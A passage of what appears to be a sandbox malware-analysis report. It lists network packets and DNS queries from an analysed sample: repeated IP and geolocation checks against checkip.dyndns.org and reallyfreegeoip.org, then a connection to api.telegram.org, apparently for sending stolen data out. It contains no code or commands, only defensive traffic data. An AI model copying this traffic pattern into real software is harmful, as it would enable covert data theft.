                                                                                          Oct 7, 2024 14:56:13.498768091 CEST44349181149.154.167.220192.168.2.22
                                                                                          Oct 7, 2024 14:56:13.498943090 CEST49181443192.168.2.22149.154.167.220
                                                                                          Oct 7, 2024 14:56:13.504663944 CEST49181443192.168.2.22149.154.167.220
                                                                                          Oct 7, 2024 14:57:08.115303993 CEST8049169158.101.44.242192.168.2.22
                                                                                          Oct 7, 2024 14:57:08.115356922 CEST4916980192.168.2.22158.101.44.242

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 7, 2024 14:55:56.739026070 CEST5456253192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:55:56.745825052 CEST53545628.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:55:56.759435892 CEST5291753192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:55:56.765903950 CEST53529178.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:55:58.115179062 CEST6275153192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:55:58.126353979 CEST53627518.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:55:59.803014994 CEST5789353192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:00.816668034 CEST5789353192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:01.094441891 CEST53578938.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:01.094680071 CEST5789353192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:01.101067066 CEST53578938.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:01.101202965 CEST53578938.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:01.127945900 CEST5482153192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:01.134907961 CEST53548218.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:01.902894974 CEST5471953192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:01.914467096 CEST53547198.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:02.550492048 CEST4988153192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:02.557107925 CEST53498818.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:02.559617996 CEST5499853192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:02.566425085 CEST53549988.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:03.117396116 CEST5278153192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:03.127489090 CEST53527818.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:03.748038054 CEST6392653192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:03.754648924 CEST53639268.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:03.757119894 CEST6551053192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:03.763658047 CEST53655108.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:03.774573088 CEST6551053192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:03.781111956 CEST53655108.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:04.394229889 CEST6267253192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:04.401290894 CEST53626728.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:05.021677017 CEST5647553192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:05.028486013 CEST53564758.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:05.030025005 CEST5647553192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:05.037401915 CEST53564758.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:05.052194118 CEST4938453192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:05.058742046 CEST53493848.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:05.543627024 CEST5484253192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:05.554567099 CEST53548428.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:06.157850027 CEST5810553192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:06.164031982 CEST53581058.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:06.170996904 CEST6492853192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:06.177615881 CEST53649288.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:07.968945980 CEST5739053192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:07.975914001 CEST53573908.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:08.756365061 CEST5809553192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:08.762989044 CEST53580958.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:08.765796900 CEST5426153192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:08.772165060 CEST53542618.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:09.700741053 CEST6050753192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:09.707715988 CEST53605078.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:10.351958036 CEST5044653192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:10.358406067 CEST53504468.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:10.361877918 CEST5593953192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:10.368470907 CEST53559398.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:11.806241035 CEST4960853192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:11.816670895 CEST53496088.8.8.8192.168.2.22
                                                                                          Oct 7, 2024 14:56:12.601583958 CEST6148653192.168.2.228.8.8.8
                                                                                          Oct 7, 2024 14:56:12.608266115 CEST53614868.8.8.8192.168.2.22

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Oct 7, 2024 14:55:56.739026070 CEST192.168.2.228.8.8.80x99b9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.759435892 CEST192.168.2.228.8.8.80x7be3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:58.115179062 CEST192.168.2.228.8.8.80x474Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:59.803014994 CEST192.168.2.228.8.8.80xadbeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:00.816668034 CEST192.168.2.228.8.8.80xadbeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.094680071 CEST192.168.2.228.8.8.80xadbeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.127945900 CEST192.168.2.228.8.8.80x1807Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.902894974 CEST192.168.2.228.8.8.80x8265Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.550492048 CEST192.168.2.228.8.8.80xb66aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.559617996 CEST192.168.2.228.8.8.80x1a53Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.117396116 CEST192.168.2.228.8.8.80x4331Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.748038054 CEST192.168.2.228.8.8.80xb2f1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.757119894 CEST192.168.2.228.8.8.80xb962Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.774573088 CEST192.168.2.228.8.8.80xb962Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:04.394229889 CEST192.168.2.228.8.8.80xedabStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.021677017 CEST192.168.2.228.8.8.80xde8aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.030025005 CEST192.168.2.228.8.8.80xde8aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.052194118 CEST192.168.2.228.8.8.80x1789Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.543627024 CEST192.168.2.228.8.8.80xd13fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.157850027 CEST192.168.2.228.8.8.80x1d09Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.170996904 CEST192.168.2.228.8.8.80x382eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:07.968945980 CEST192.168.2.228.8.8.80x592aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.756365061 CEST192.168.2.228.8.8.80x603aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.765796900 CEST192.168.2.228.8.8.80x4ef7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:09.700741053 CEST192.168.2.228.8.8.80xb470Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.351958036 CEST192.168.2.228.8.8.80x79e9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.361877918 CEST192.168.2.228.8.8.80x4b46Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:11.806241035 CEST192.168.2.228.8.8.80x736dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:12.601583958 CEST192.168.2.228.8.8.80x101aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Oct 7, 2024 14:55:56.745825052 CEST8.8.8.8192.168.2.220x99b9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.745825052 CEST8.8.8.8192.168.2.220x99b9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.745825052 CEST8.8.8.8192.168.2.220x99b9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.745825052 CEST8.8.8.8192.168.2.220x99b9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.745825052 CEST8.8.8.8192.168.2.220x99b9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.745825052 CEST8.8.8.8192.168.2.220x99b9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.765903950 CEST8.8.8.8192.168.2.220x7be3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.765903950 CEST8.8.8.8192.168.2.220x7be3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.765903950 CEST8.8.8.8192.168.2.220x7be3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.765903950 CEST8.8.8.8192.168.2.220x7be3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.765903950 CEST8.8.8.8192.168.2.220x7be3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:56.765903950 CEST8.8.8.8192.168.2.220x7be3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:58.126353979 CEST8.8.8.8192.168.2.220x474No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:55:58.126353979 CEST8.8.8.8192.168.2.220x474No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.094441891 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.094441891 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.094441891 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.094441891 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.094441891 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.094441891 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101067066 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101067066 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101067066 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101067066 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101067066 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101067066 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101202965 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101202965 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101202965 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101202965 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101202965 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.101202965 CEST8.8.8.8192.168.2.220xadbeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.134907961 CEST8.8.8.8192.168.2.220x1807No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.134907961 CEST8.8.8.8192.168.2.220x1807No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.134907961 CEST8.8.8.8192.168.2.220x1807No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.134907961 CEST8.8.8.8192.168.2.220x1807No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.134907961 CEST8.8.8.8192.168.2.220x1807No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.134907961 CEST8.8.8.8192.168.2.220x1807No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.914467096 CEST8.8.8.8192.168.2.220x8265No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:01.914467096 CEST8.8.8.8192.168.2.220x8265No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.557107925 CEST8.8.8.8192.168.2.220xb66aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.557107925 CEST8.8.8.8192.168.2.220xb66aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.557107925 CEST8.8.8.8192.168.2.220xb66aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.557107925 CEST8.8.8.8192.168.2.220xb66aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.557107925 CEST8.8.8.8192.168.2.220xb66aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.557107925 CEST8.8.8.8192.168.2.220xb66aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.566425085 CEST8.8.8.8192.168.2.220x1a53No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.566425085 CEST8.8.8.8192.168.2.220x1a53No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.566425085 CEST8.8.8.8192.168.2.220x1a53No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.566425085 CEST8.8.8.8192.168.2.220x1a53No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.566425085 CEST8.8.8.8192.168.2.220x1a53No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:02.566425085 CEST8.8.8.8192.168.2.220x1a53No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.127489090 CEST8.8.8.8192.168.2.220x4331No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.127489090 CEST8.8.8.8192.168.2.220x4331No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.754648924 CEST8.8.8.8192.168.2.220xb2f1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.754648924 CEST8.8.8.8192.168.2.220xb2f1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.754648924 CEST8.8.8.8192.168.2.220xb2f1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.754648924 CEST8.8.8.8192.168.2.220xb2f1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.754648924 CEST8.8.8.8192.168.2.220xb2f1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.754648924 CEST8.8.8.8192.168.2.220xb2f1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.763658047 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.763658047 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.763658047 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.763658047 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.763658047 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.763658047 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.781111956 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.781111956 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.781111956 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.781111956 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.781111956 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:03.781111956 CEST8.8.8.8192.168.2.220xb962No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:04.401290894 CEST8.8.8.8192.168.2.220xedabNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:04.401290894 CEST8.8.8.8192.168.2.220xedabNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.028486013 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.028486013 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.028486013 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.028486013 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.028486013 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.028486013 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.037401915 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.037401915 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.037401915 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.037401915 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.037401915 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.037401915 CEST8.8.8.8192.168.2.220xde8aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.058742046 CEST8.8.8.8192.168.2.220x1789No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.058742046 CEST8.8.8.8192.168.2.220x1789No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.058742046 CEST8.8.8.8192.168.2.220x1789No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.058742046 CEST8.8.8.8192.168.2.220x1789No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.058742046 CEST8.8.8.8192.168.2.220x1789No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.058742046 CEST8.8.8.8192.168.2.220x1789No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.554567099 CEST8.8.8.8192.168.2.220xd13fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:05.554567099 CEST8.8.8.8192.168.2.220xd13fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.164031982 CEST8.8.8.8192.168.2.220x1d09No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.164031982 CEST8.8.8.8192.168.2.220x1d09No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.164031982 CEST8.8.8.8192.168.2.220x1d09No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.164031982 CEST8.8.8.8192.168.2.220x1d09No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.164031982 CEST8.8.8.8192.168.2.220x1d09No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.164031982 CEST8.8.8.8192.168.2.220x1d09No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.177615881 CEST8.8.8.8192.168.2.220x382eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.177615881 CEST8.8.8.8192.168.2.220x382eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.177615881 CEST8.8.8.8192.168.2.220x382eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.177615881 CEST8.8.8.8192.168.2.220x382eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.177615881 CEST8.8.8.8192.168.2.220x382eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:06.177615881 CEST8.8.8.8192.168.2.220x382eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:07.975914001 CEST8.8.8.8192.168.2.220x592aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:07.975914001 CEST8.8.8.8192.168.2.220x592aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.762989044 CEST8.8.8.8192.168.2.220x603aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.762989044 CEST8.8.8.8192.168.2.220x603aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
